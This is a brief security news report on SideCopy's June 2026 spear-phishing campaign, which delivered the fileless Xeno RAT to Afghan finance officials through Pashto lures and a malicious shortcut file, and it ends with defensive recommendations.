SIDECOPY, a Pakistani APT group, has been observed deploying the Xeno RAT against the Afghan Ministry of Finance in a spear‑phishing campaign that began in early June 2026. The attack uses malicious emails with Pashto‑language lures to trick officials into opening a booby‑trapped shortcut that delivers the remote access tool (Seqrite’s analysis).
Xeno RAT operates as a fileless payload, leveraging legitimate Windows utilities such as PowerShell and WMIC to download and execute additional stages directly in memory. The initial vector is a .lnk file that, when clicked, runs a command line that contacts a command‑and‑control server and pulls down the RAT without touching disk.
The malware also drops a decoy document that appears to be an official finance report, keeping the victim’s attention while the malicious code establishes persistence through a registry run key or a scheduled task. No public CVE has been assigned to the techniques used, reflecting the reliance on legitimate tools rather than software vulnerabilities.
Researchers at Seqrite first highlighted the activity on 3 June 2026, noting that the campaign aligns with SideCopy’s historic focus on South Asian governmental targets. Dark Reading reported the operation, emphasizing the group’s use of localized lures to increase success rates against Afghan officials.
Afghan governmental networks remain exposed due to limited cyber‑security staffing and a reliance on legacy systems inherited after the 2021 transition, which gives threat actors a reliable foothold for espionage. The campaign demonstrates how adversaries adapt social engineering to regional languages to bypass generic defenses.
Defenders should enforce strict email attachment policies, block execution of .lnk and .js files from external sources, and enable PowerShell logging and constrained language mode. Additionally, maintaining up‑to‑date endpoint detection and response solutions and conducting regular phishing awareness training can reduce the likelihood of successful fileless intrusions.